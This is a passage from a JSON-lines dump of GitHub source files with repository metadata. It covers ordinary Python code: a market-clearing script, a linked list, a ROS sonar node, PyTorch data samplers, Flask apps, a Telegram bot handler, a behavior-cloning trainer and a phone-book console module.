pd.read_excel(open('Data_Files/network15bus.xlsx', 'rb'),sheet_name='Bus',index_col=0)\r\nbus.columns = ['type', 'Vmax', 'Vmin']\r\nnodes = list(bus.index)\r\n\r\n# Upload bids\r\nall_bids = pd.read_csv('Data_Files\\Bids.csv',index_col=0)\r\n\r\nall_bids.columns = ['Bid','Type','Bus','P_or_Q', 'Direction','Quantity','Price','Time_target','Time_stamp']\r\nall_bids.index.names = ['ID']\r\n\r\n# Create empty dataframes to contain the bids that were not matched (order book)\r\norderbook_offer = pd.DataFrame(columns = ['ID','Bus','P_or_Q','Direction','Quantity','Price','Time_target','Time_stamp'])\r\norderbook_offer.set_index('ID',inplace=True)\r\norderbook_request = pd.DataFrame(columns = ['ID','Bus','Type','P_or_Q','Direction','Quantity','Price','Time_target','Time_stamp'])\r\norderbook_request.set_index('ID',inplace=True)\r\n# Create an empty dataframe to contain the accepted conditional requests\r\naccepted_requests = pd.DataFrame(columns = ['Bus','Direction','P_or_Q','Dispatch Change','Time_target'])\r\n\r\n#%% Function to match a new offer\r\nmatches = pd.DataFrame(columns = ['Offer','Offer Bus','Request','Request Bus','P_or_Q','Direction','Quantity','Matching Price','Time_target'])\r\n\r\nSocialWelfare = 0\r\nProcurementCost = 0\r\nfor b in all_bids.index:\r\n new_bid = all_bids.loc[b]\r\n matche, orderbook_request, orderbook_offer, accepted_requests, Setpoint, flag,SocialWelfare,ProcurementCost = Market_clearing(new_bid, orderbook_request, orderbook_offer, accepted_requests, Setpoint,SocialWelfare,ProcurementCost)\r\n matches=matches.append(matche)\r\n print(b+'--'+flag)\r\n \r\n \r\n\r\norderbook_offer.columns = ['location','type', 'regulation','volume','price','timetarget','timestamp']\r\norderbook_offer.index.names = ['offerId']\r\norderbook_request.columns = ['location','requestType','type', 'regulation','volume','price','timetarget','timestamp']\r\norderbook_request.index.names = ['flexRequestId']\r\n\r\naccepted_requests.columns = ['location', 'regulation','type','volume','timetarget']\r\naccepted_requests.index.names = ['flexRequestId']\r\n\r\nmatches.columns =['offerId','offerlocation','flexRequestId','requestlocation','type','regulation','volume','matchingprice','timetarget']\r\n","repo_name":"FLEXGRID-DTU/P_and_Q_Reserve_Market_Clearing","sub_path":"Continuous_P_and_Q_Market_Clearing.py","file_name":"Continuous_P_and_Q_Market_Clearing.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"35226677499","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n def __repr__(self): #__repr__ exists so you don't have to type cast the class into String data type\r\n return self.data\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None\r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n\r\n def __repr__(self): #enables LinkedList to have a DEFAULT string representation\r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n def __iter__(self): #enables LinkedList to become an iterable object\r\n node = self.head\r\n while node is not None:\r\n yield node\r\n node = node.next\r\n\r\n def add_first(self, node):\r\n node.next = self.head\r\n self.head = node\r\n\r\n def add_last(self, 
node):\r\n if not self.head:\r\n self.head = node\r\n return\r\n for current_node in self: #After the entire list is iterated, the pointer does not return back to 0.\r\n pass # Linked lists cannot be indexed.\r\n current_node.next = node #current_node pointer is at the last item\r\n\r\n def add_after(self, target_node_data, new_node):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n for node in self:\r\n if node.data == target_node_data:\r\n new_node.next = node.next\r\n node.next = new_node\r\n return\r\n\r\n raise Exception(\"Node with data '%s' not found\" % target_node_data)\r\n \r\n def add_before(self, target_node_data, new_node):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n if target_node_data == self.head.data:\r\n self.add_first(new_node)\r\n\r\n prev_node = self.head\r\n for node in self:\r\n if target_node_data == node.data:\r\n prev_node.next = new_node\r\n new_node.next = node\r\n return\r\n prev_node = node\r\n\r\n raise Exception(\"Node with data %s is not found!\" % target_node_data)\r\n\r\n def remove_node(self, target_node_data):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n if target_node_data == self.head.data:\r\n self.head = self.head.next\r\n return\r\n\r\n prev_node = self.head\r\n for node in self:\r\n if target_node_data == node.data:\r\n prev_node.next = node.next\r\n return\r\n prev_node = node\r\n\r\n raise Exception(\"Node with data %s is not found!\" % target_node_data)\r\n \r\n\r\n'''linked_list = LinkedList()\r\nprint(linked_list)\r\n\r\nfirst_node = Node(\"c\")\r\nsecond_node = Node(\"b\")\r\nthird_node = Node(\"a\")\r\nlinked_list.head = first_node\r\nfirst_node.next = second_node\r\nsecond_node.next = third_node\r\nlinked_list.add_first(Node(\"d\"))\r\nprint(linked_list)\r\n\r\n\r\nlinked_list2 = LinkedList([\"a\",\"b\",\"c\",\"d\",\"e\",\"f\"])\r\nprint(linked_list2)'''\r\n\r\nlinked_list = LinkedList()\r\nlinked_list.add_last(Node(\"b\"))\r\nlinked_list.add_last(Node(\"c\"))\r\nlinked_list.add_last(Node(\"d\"))\r\nlinked_list.add_first(Node(\"a\"))\r\nlinked_list.add_last(Node(\"e\"))\r\nlinked_list.add_after(\"c\", Node(\"cx\"))\r\nlinked_list.add_before(\"c\", Node(\"bx\"))\r\n\r\nprint(linked_list)\r\n","repo_name":"kristiansantos11/datastructure-and-algorithms","sub_path":"algorithms part 1/linked_lists/optimized_linked_list.py","file_name":"optimized_linked_list.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73843503730","text":"#!/usr/bin/env python\nfrom rospy import Publisher, init_node, Rate, is_shutdown, get_rostime, ROSInterruptException\nfrom std_msgs.msg import Float64\nimport RPi.GPIO as GPIO\nimport time\nfrom blimp_control.msg import Float64WithHeader\nGPIO.setmode(GPIO.BCM)\n\nTRIG = 23\nECHO = 24\n\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO,GPIO.IN)\n\nGPIO.output(TRIG, False)\ntime.sleep(2)\n\ndef sonar():\n pub = Publisher('sonar_meas', Float64WithHeader, queue_size=10)\n pub1 = Publisher('sonar_meas_control', Float64, queue_size=10)\n init_node('sonar', anonymous=True)\n rate = Rate(20) # 10hz\n while not is_shutdown():\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n count = 0\n while GPIO.input(ECHO)==0:\n if count>1000:\n break\n pulse_start = time.time()\n count += 1\n\n count = 0\n while GPIO.input(ECHO)==1:\n if count>1000:\n break\n pulse_end = time.time()\n count += 1\n\n pulse_duration = pulse_end - pulse_start\n\n 
distance = pulse_duration*17150\n distance = distance/100.0\n\n sonar_data = Float64WithHeader()\n sonar_data.header.stamp = get_rostime()\n if abs(distance) < 2.0:\n sonar_data.float.data = distance\n pub1.publish(distance)\n else:\n sonar_data.float.data = 0.0\n pub1.publish(0.0)\n pub.publish(sonar_data)\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n sonar()\n except ROSInterruptException:\n pass\n","repo_name":"DanielDworakowski/flot","sub_path":"rasp/blimp_ws/src/blimp_control/src/hc_sr04_node.py","file_name":"hc_sr04_node.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"10104293974","text":"# Standard Library\nimport math\nfrom collections import defaultdict\n\n# Import from third library\nimport numpy as np\nimport torch\nfrom torch.utils.data.sampler import Sampler\n\nfrom up.utils.env.dist_helper import env, get_rank, get_world_size\nfrom up.utils.general.log_helper import default_logger as logger\nfrom up.utils.general.registry_factory import SAMPLER_REGISTRY\n\n__all__ = ['DistributedSampler', 'LocalSampler', 'TestDistributedSampler']\n\n\n@SAMPLER_REGISTRY.register('dist')\nclass DistributedSampler(Sampler):\n \"\"\"\n Sampler that restricts data loading to a subset of the dataset.\n\n .. note:\n Dataset is assumed to be of constant size.\n\n Arguments:\n dataset (Dataset): dataset used for sampling.\n num_replicas (int): number of processes participating in distributed training, optional.\n rank (int): rank of the current process within num_replicas, optional.\n \"\"\"\n\n def __init__(self, dataset, num_replicas=None, rank=None, fix_seed=False):\n \"\"\"\n Arguments:\n - dataset (:obj:`dataset`): instance of dataset object\n \"\"\"\n if num_replicas is None:\n num_replicas = env.world_size\n if rank is None:\n rank = env.rank\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n self.fix_seed = fix_seed\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n g = torch.Generator()\n g.manual_seed(self.epoch * (not self.fix_seed))\n indices = list(torch.randperm(len(self.dataset), generator=g))\n\n # add extra samples to make it evenly divisible\n # indices += indices[:(self.total_size - len(indices))]\n padding_size = self.total_size - len(indices)\n if padding_size <= len(indices):\n indices += indices[:padding_size]\n else:\n indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n assert len(indices) == self.total_size\n\n # subsample\n offset = self.num_samples * self.rank\n indices = indices[offset:offset + self.num_samples]\n assert len(indices) == self.num_samples\n\n return iter(indices)\n\n def __len__(self):\n return self.num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n\n@SAMPLER_REGISTRY.register('local')\nclass LocalSampler(Sampler):\n def __init__(self, dataset, rank=None):\n if rank is None:\n rank = env.rank\n self.dataset = dataset\n self.rank = rank\n self.epoch = 0\n self.num_samples = len(self.dataset)\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n g = torch.Generator()\n g.manual_seed(self.epoch + self.rank)\n indices = list(torch.randperm(self.num_samples, generator=g))\n return iter(indices)\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n def __len__(self):\n return 
self.num_samples\n\n\n@SAMPLER_REGISTRY.register('dist_test')\nclass TestDistributedSampler(Sampler):\n \"\"\"\n Sampler that restricts data loading to a subset of the dataset, but won't align the total data\n size to be divisible by world_size bacause this will lead to duplicate detecton results\n \"\"\"\n\n def __init__(self, dataset, num_replicas=None, rank=None):\n \"\"\"\n Arguments:\n - dataset (:obj:`dataset`): instance of dataset object\n \"\"\"\n if num_replicas is None:\n num_replicas = env.world_size\n if rank is None:\n rank = env.rank\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = len(range(rank, len(self.dataset), num_replicas))\n self.total_size = len(self.dataset)\n\n def __iter__(self):\n indices = torch.arange(len(self.dataset))\n indices = indices[self.rank::self.num_replicas]\n assert len(indices) == self.num_samples\n return iter(indices)\n\n def __len__(self):\n return self.num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n\n@SAMPLER_REGISTRY.register('repeat_factor')\nclass DistributedRepeatFactorReSampler(Sampler):\n \"\"\" Suitable for long-tail distribution datasets.\n Refer to `LVIS `_ paper\n \"\"\"\n def __init__(self, dataset, t=0.001, ri_mode='random_round', pn=0.5,\n ri_if_empty=1, num_replicas=None, static_size=True, rank=None):\n \"\"\"\n Arguments:\n - dataset (:obj:`Dataset`): dataset used for sampling.\n - t (:obj:`float`): thresh- old that intuitively controls the point at which oversampling kicks in\n - ri_mode (:obj:`str`): choices={floor, round, random_round, ceil, c_ceil_r_f_floor}, method to compute\n repeat factor for one image\n - pn (:obj:`float`): power number\n - num_replicas (int): number of processes participating in distributed training, optional.\n - rank (int): rank of the current process within num_replicas, optional.\n \"\"\"\n if num_replicas is None:\n num_replicas = get_world_size()\n if rank is None:\n rank = get_rank()\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n self.original_num_samples = self.num_samples\n self.t = t\n self.ri_mode = ri_mode\n self.ri_if_empty = int(ri_if_empty)\n self.pn = pn\n self.static_size = static_size\n self._prepare()\n logger.info('init re-sampler, ri mode: {}'.format(self.ri_mode))\n\n def _prepare(self):\n # prepare re-sampling factor for category\n rc = defaultdict(int)\n img_num_per_class = defaultdict(int)\n for cls, img_num in sorted(self.dataset.num_images_per_class.items()):\n f = img_num / len(self.dataset)\n img_num_per_class[cls] = img_num\n rc[cls] = max(1, math.pow(self.t / f, self.pn))\n logger.info('class id {}, image count {}, rc {}'.format(cls, img_num, rc[cls]))\n self.rc = rc\n\n def _compute_ri(self, img_index):\n classes = self.dataset.get_image_classes(img_index)\n ris = [self.rc[cls] for cls in classes]\n if len(ris) == 0:\n return self.ri_if_empty\n if self.ri_mode == 'floor':\n ri = int(max(ris))\n elif self.ri_mode == 'round':\n ri = round(max(ris))\n elif self.ri_mode == 'random_round':\n ri_max = max(ris)\n p = ri_max - int(ri_max)\n if np.random.rand() < p:\n ri = math.ceil(ri_max)\n else:\n ri = int(ri_max)\n elif self.ri_mode == 'ceil':\n ri = math.ceil(max(ris))\n elif self.ri_mode == 'c_ceil_r_f_floor':\n max_ind = np.argmax(ris)\n assert hasattr(self.dataset, 'lvis'), 'Only lvis dataset 
supportted for c_ceil_r_f_floor mode'\n img_id = self.dataset.img_ids[img_index]\n meta_annos = self.dataset.lvis.img_ann_map[img_id]\n f = self.dataset.lvis.cats[meta_annos[max_ind]['category_id']]['frequency']\n assert f in ['f', 'c', 'r']\n if f in ['r', 'f']:\n ri = int(max(ris))\n else:\n ri = math.ceil(max(ris))\n else:\n raise NotImplementedError\n return ri\n\n def _get_new_indices(self):\n indices = []\n for idx in range(len(self.dataset)):\n ri = self._compute_ri(idx)\n indices += [idx] * ri\n\n logger.info('dataset size {}, indexes size {}'.format(len(self.dataset), len(indices)))\n return indices\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n\n # generate a perm based using class-aware balance for this epoch\n indices = self._get_new_indices()\n\n # override num_sample total size\n self.num_samples = int(math.ceil(len(indices) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n\n indices = np.random.RandomState(seed=self.epoch).permutation(np.array(indices))\n indices = list(indices)\n\n # add extra samples to make it evenly divisible\n indices += indices[:(self.total_size - len(indices))]\n assert len(indices) == self.total_size\n\n # subsample\n offset = self.num_samples * self.rank\n indices = indices[offset:offset + self.num_samples]\n assert len(indices) == self.num_samples\n\n # convert to int because this array will be converted to torch.tensor,\n # but torch.as_tensor dosen't support numpy.int64\n # a = torch.tensor(np.float64(1)) # works\n # b = torch.tensor(np.int64(1)) # fails\n indices = list(map(lambda x: int(x), indices))\n return iter(indices)\n\n def __len__(self):\n return self.original_num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n","repo_name":"Sense-X/UniHead","sub_path":"up/data/samplers/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"20"} +{"seq_id":"40025379346","text":"'''Global variables :) '''\nstr = \"This is a simple text used to verified the correct functionality of str_replacing function. 
Adding a Z and a z\"\nabc = {'a':0, 'b':0, 'c':0, 'd':0, 'e':0, 'f':0, 'g':0, 'h':0, 'i':0,'j':0,'k':0,'l':0,'m':0,'n':0,'o':0,'p':0,'q':0,'r':0,'s':0,'t':0,'u':0,'v':0,'w':0,'y':0,'z':0}\n\nprint('\\n======= Search an url into a given text ======\\n')\nsearch = \"i\"\nrpl = \"0\"\ndef str_searching():\n global str\n targ=\"http\"\n ini = 0\n fin = 0\n if str.find(targ)>0 :\n ini = str.find(targ)\n new_str = str[ini:len(str)]\n fin = new_str.find(' ')\n print('There is a url in text ', new_str[0:fin])\n else:\n print (\"There is not a url in text\")\nstr_searching()\n\nprint('\\n======= Replacing a letter from a string ======\\n')\ndef str_replacing():\n global search\n global rpl\n global str\n print('OLD text: \\n', str)\n new_str=\" \"\n glue=\" \"\n i=0\n for i in range (len(str)):\n if str[i].lower() == search:\n new_str= new_str + glue.join(rpl)\n else:\n new_str= new_str + glue.join(str[i])\n i += 1\n print('NEW text: \\n', new_str)\nstr_replacing()\n\nprint('\\n======= Count how many times a letter is repeated on a text ======\\n')\ndef str_countAlpha():\n global str\n global abc\n i=0\n for i in range (len(str)):\n if str[i].lower() != \" \":\n if str[i].lower() in abc:\n abc[str[i].lower()] +=1\n print (abc)\n\nstr_countAlpha()\n","repo_name":"mauricioZelaya/QETraining_BDT_python","sub_path":"RosarioFalconi/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"20"} +{"seq_id":"32210668327","text":"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\n\"\"\"\n\n6.1. Layers and Modules\n\"\"\"\nnet = nn.Sequential(nn.LazyLinear(256), nn.ReLU(), nn.LazyLinear(10))\n\nX = torch.rand(2, 20)\nprint(net(X).shape)\n\n\n\"\"\"\n\n6.1.1. A Custom Module\n\"\"\"\nclass MLP(nn.Module):\n def __init__(self):\n # Call the constructor of the parent class nn.Module to perform\n # the necessary initialization\n super().__init__()\n self.hidden = nn.LazyLinear(256)\n self.out = nn.LazyLinear(10)\n\n # Define the forward propagation of the model, that is, how to return the\n # required model output based on the input X\n def forward(self, X):\n return self.out(F.relu(self.hidden(X)))\n \n\nnet = MLP()\nprint(net(X).shape)\n\n\n\"\"\"\n\n6.1.2. The Sequential Module\n\"\"\"\nclass MySequential(nn.Module):\n def __init__(self, *args):\n super().__init__()\n for idx, module in enumerate(args):\n self.add_module(str(idx), module) # layer_name be not the same, like parameters str.\n\n def forward(self, X):\n for module in self.children():\n X = module(X)\n return X\n\nnet = MySequential(nn.LazyLinear(256), nn.ReLU(), nn.LazyLinear(10))\nnet(X).shape\n\n\n\"\"\"\n \n6.1.3. Executing Code in the Forward Propagation Method\n\"\"\"\nclass FixedHiddenMLP(nn.Module):\n def __init__(self):\n super().__init__()\n # Random weight parameters that will not compute gradients and\n # therefore keep constant during training\n self.rand_weight = torch.rand((20, 20))\n self.linear = nn.LazyLinear(20)\n\n def forward(self, X):\n X = self.linear(X)\n X = F.relu(X @ self.rand_weight + 1)\n # Reuse the fully connected layer. 
This is equivalent to sharing\n # parameters with two fully connected layers\n X = self.linear(X)\n # Control flow\n while X.abs().sum() > 1:\n X /= 2\n return X.sum()\n\nnet = FixedHiddenMLP()\nnet(X)\n\n\n\"\"\"\n\n组合嵌套块\n\"\"\"\nclass NestMLP(nn.Module):\n def __init__(self):\n super().__init__()\n self.net = nn.Sequential(nn.LazyLinear(64), nn.ReLU(),\n nn.LazyLinear(32), nn.ReLU())\n self.linear = nn.LazyLinear(16)\n\n def forward(self, X):\n return self.linear(self.net(X))\n\nchimera = nn.Sequential(NestMLP(), nn.LazyLinear(20), FixedHiddenMLP())\nchimera(X)","repo_name":"yingmuzhi/deep_learning","sub_path":"chapter6/6.1. Layers and Modules.py","file_name":"6.1. Layers and Modules.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36231430155","text":"from aiogram import Dispatcher, types\n\nfrom src.crud import crud_user\nfrom src.db import SessionLocal\nfrom src.models import User\nfrom src.telegram_bot.init import bot\nfrom src.telegram_bot.keyboard_markups import kbm_main_menu\n\nLIST_LEARNING_COLLECTION_ERROR_1 = \"Ошибка! У вас нет добавленных тренировок!\"\n\n\nasync def list_learning_collections(query: types.CallbackQuery):\n \"\"\"\n Adding user into the database after\n user executes /start command.\n \"\"\"\n db = SessionLocal()\n\n user_telegram_id = query.from_user.id\n user = crud_user.get_by_telegram_id(db, user_telegram_id)\n user_learning_collection_names = [\n user_learning_collection.learning_collection.name for user_learning_collection in user.learning_collections\n ]\n\n response_message = \"\\n\".join(user_learning_collection_names)\n\n if not response_message:\n response_message = LIST_LEARNING_COLLECTION_ERROR_1\n\n await bot.send_message(user.telegram_id, response_message, reply_markup=kbm_main_menu)\n\n\ndef register_list_learning_collections_command(bot_dispatcher: Dispatcher):\n bot_dispatcher.register_callback_query_handler(list_learning_collections, text=\"list_learning_collections\")\n","repo_name":"jakefish18/UesugiToolBot","sub_path":"src/telegram_bot/client_commands/list_learning_collections.py","file_name":"list_learning_collections.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"1325799252","text":"from typing import Any, Generic, Iterable, Mapping, Optional, TypeVar, Union\n\nimport torch as th\nimport numpy as np\nimport torch.utils.data as th_data\n\nfrom imitation.algorithms import bc\nfrom imitation.algorithms.bc import BehaviorCloningLossCalculator, BehaviorCloningTrainer\nfrom imitation.data import rollout, types\nfrom stable_baselines3.common import policies\n\n\ndef my_super_awesome_collate_fn(batch):\n \"I stole this from https://github.com/HumanCompatibleAI/imitation/pull/415/files\"\n\n spec_keys = [\"infos\", \"obs\", \"next_obs\"] if isinstance(batch[0]['obs'], dict) else [\"infos\"]\n batch_no_infos = [\n {k: np.array(v) for k, v in sample.items() if k not in spec_keys} for sample in batch\n ]\n result = th_data.dataloader.default_collate(batch_no_infos)\n assert isinstance(result, dict)\n\n # zip result[\"obs\"] into TensorDict\n if \"obs\" in spec_keys:\n result[\"obs\"] = {obs_key: np.array([sample[\"obs\"][obs_key] for sample in batch]) \\\n for obs_key in batch[0][\"obs\"]}\n result[\"next_obs\"] = {obs_key:np.array([sample[\"next_obs\"][obs_key] for sample in batch]) \\\n for obs_key in batch[0][\"obs\"]}\n 
result[\"infos\"] = [sample[\"infos\"] for sample in batch]\n return result\n\n\ndef make_data_loader(transitions, batch_size, data_loader_kwargs=None):\n \"modified from https://github.com/HumanCompatibleAI/imitation/blob/ed45793dfdd897d3ac1f3a863a8816b56d436887/src/imitation/algorithms/base.py\"\n if batch_size <= 0:\n raise ValueError(f\"batch_size={batch_size} must be positive.\")\n\n if isinstance(transitions, Iterable):\n try:\n first_item = next(iter(transitions))\n except StopIteration:\n first_item = None\n if isinstance(first_item, types.Trajectory):\n transitions = rollout.flatten_trajectories(list(transitions))\n\n if isinstance(transitions, types.TransitionsMinimal):\n if len(transitions) < batch_size:\n raise ValueError(\n f\"Number of transitions in `demonstrations` {len(transitions)} \"\n f\"is smaller than batch size {batch_size}.\",\n )\n\n extra_kwargs = dict(shuffle=True, drop_last=True)\n if data_loader_kwargs is not None:\n extra_kwargs.update(data_loader_kwargs)\n return th_data.DataLoader(\n transitions,\n batch_size=batch_size,\n collate_fn=my_super_awesome_collate_fn,\n **extra_kwargs,\n )\n elif isinstance(transitions, Iterable):\n return _WrappedDataLoader(transitions, batch_size)\n else:\n raise TypeError(f\"`demonstrations` unexpected type {type(transitions)}\")\n\n\nclass BehaviorCloningTrainerDictObs(BehaviorCloningTrainer):\n \"\"\"Functor to fit a policy to expert demonstration data.\"\"\"\n\n loss: BehaviorCloningLossCalculator\n optimizer: th.optim.Optimizer\n policy: policies.ActorCriticPolicy\n\n def __call__(self, batch):\n obs = self.preprocess_obs(batch['obs'])\n acts = th.as_tensor(batch[\"acts\"], device=self.policy.device).detach()\n training_metrics = self.loss(self.policy, obs, acts)\n\n self.optimizer.zero_grad()\n training_metrics.loss.backward()\n self.optimizer.step()\n\n return training_metrics\n \n def preprocess_img(self, obs):\n assert isinstance(obs, np.ndarray)\n\n obs = obs / 255\n obs = np.transpose(obs, (0, 3, 1, 2))\n obs = th.as_tensor(obs, dtype=th.float32, device=self.policy.device).detach()\n return obs\n\n def preprocess_obs(self, obs):\n processed_obs = {}\n for key, val in obs.items():\n if len(val.shape) == 4:\n processed_obs[key] = self.preprocess_img(val)\n else:\n processed_obs[key] = th.as_tensor(\n obs[key], dtype=th.float32, device=self.policy.device\n ).detach()\n\n return processed_obs\n\n\nclass BC_(bc.BC):\n '''\n The BC implementation in imiation does not support dict observations, so we have to override their functions that create their dataloaders\n '''\n def __init__(\n self,\n *,\n observation_space,\n action_space,\n policy,\n demonstrations,\n batch_size=32,\n optimizer_cls=th.optim.Adam,\n optimizer_kwargs={},\n ent_weight=1e-3,\n l2_weight=0.0,\n device=\"auto\",\n custom_logger=None,\n ):\n super(BC_, self).__init__(\n observation_space=observation_space,\n action_space=action_space,\n policy=policy,\n demonstrations=demonstrations,\n batch_size=batch_size,\n optimizer_cls=optimizer_cls,\n optimizer_kwargs=optimizer_kwargs,\n ent_weight=ent_weight,\n l2_weight=l2_weight,\n device=device,\n custom_logger=custom_logger,\n )\n\n optimizer_kwargs = optimizer_kwargs or {}\n optimizer = optimizer_cls(\n self.policy.parameters(),\n **optimizer_kwargs,\n )\n loss_computer = BehaviorCloningLossCalculator(ent_weight, l2_weight)\n self.trainer = BehaviorCloningTrainerDictObs(\n loss_computer,\n optimizer,\n policy,\n )\n\n def set_demonstrations(self, demonstrations):\n self._demo_data_loader = make_data_loader(\n 
demonstrations,\n self.batch_size,\n )","repo_name":"mpiseno/nat-rl","sub_path":"nat_rl/algos/bc.py","file_name":"bc.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"33897621123","text":"from exception import logging\n\n\ndef input_data() -> list[str]:\n try:\n lst = ['' for i in range(4)]\n lst[0] = input_surname()\n lst[1] = input_name()\n lst[2] = input_telephone()\n lst[3] = input_comment()\n print_separator()\n return lst\n except Exception as e:\n logging.debug(e)\n\n\ndef input_surname():\n try:\n return input(\"Введите Фамилию: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_name():\n try:\n return input(\"Введите Имя: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_telephone():\n try:\n return input(\"Введите телефон: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_comment():\n try:\n return input(\"Введите комментарий: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_info():\n try:\n return input(\"Искать: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_number() -> str:\n try:\n num = input('Введите номер: ')\n num = num.replace('-', '')\n num = num.replace(' ', '')\n return num\n except Exception as e:\n logging.debug(e)\n\n\ndef input_choose(message: str = f'Ваш выбор (Что бы повторить меню - 5) > ') -> int:\n try:\n return int(input(message))\n except Exception as e:\n logging.debug(e)\n\n\ndef print_choose_action_menu():\n print(\"Выберите - что хотите сделать: \"\n \"\\n1 - Поиск контакта \"\n \"\\n2 - Распечатать телефонную книгу \"\n \"\\n3 - Добавить запись в телефонную книгу \"\n \"\\n4 - Удаление запись из телефонной книги \"\n \"\\n5 - Главное меню \"\n \"\\n6 - Выход\\n \")\n\n\ndef print_data(input_array: list):\n print(f\"Фамилия: {input_array[0]}\")\n print(f\"Имя: {input_array[1]}\")\n print(f\"Номер телефона: {input_array[2]}\")\n print(f\"Комментарий: {input_array[3]}\")\n print_separator()\n\n\ndef print_not_found():\n print('Контакт не найден, попробуйте ещё раз')\n print_separator()\n\n\ndef print_separator():\n print('---------------------')\n","repo_name":"ShadowGreg/TelephoneDirectory","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"70668481971","text":"from flask import Flask\r\nfrom flask_restful import Api, Resource\r\n\r\nimport application\r\napp = Flask(__name__)\r\napi = Api(app)\r\n \r\nclass GitHub(Resource):\r\n def get(self):\r\n\r\n res = application.trending_repos()\r\n return res\r\n\r\napi.add_resource(GitHub, \"/trending_language\")\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True)","repo_name":"massaoudiikram/backend_challenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22164158541","text":"from flask import Flask, render_template, request, jsonify\nimport json\nfrom API.routes import api_bp, recipes\n\napp = Flask(__name__)\napp.register_blueprint(api_bp, url_prefix='/api') # Registra el Blueprint del API\n\n@app.route('/', methods=['GET'])\ndef show_feed():\n return render_template('feed.html', recipes=recipes)\n\n@app.route('/buscar', methods=['GET'])\ndef search_recipe():\n query = request.args.get('query', '') # Consulta del formulario de búsqueda\n 
results = []\n for recipe in recipes:\n if query.lower() in recipe['name'].lower() or \\\n query.lower() in recipe['creator'].lower() or \\\n any(query.lower() in ingredient.lower() for ingredient in recipe['ingredients']):\n results.append(recipe)\n\n return render_template('results.html', results=results, query=query)\n\n@app.route('/results', methods=['GET'])\ndef show_results():\n search_query = request.args.get('query', '').lower()\n matching_recipes = [recipe for recipe in recipes if\n search_query in recipe['name'].lower() or\n search_query in recipe['creator'].lower() or\n any(search_query in ingredient.lower() for ingredient in recipe['ingredients'])]\n \n return render_template('results.html', query=search_query, resultados=matching_recipes)\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"MichelleDardon10/RecipesApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72689769970","text":"import os\nimport cv2\n\nsets_list = [\"train\", \"test\"]\n\ndataDir = \"/home/swei/workdir/landmark/landmark\"\n\nfor set_list in sets_list:\n\n org_txt = os.path.join(dataDir, \"%s_list.txt\"%(set_list))\n dst_txt = os.path.join(os.getcwd(), \"%s_list.txt\"%(set_list))\n\n filenames_queue = open(org_txt, \"r\").readlines()\n dst_list = open(dst_txt, \"w\")\n for filename_queue in filenames_queue:\n filename = 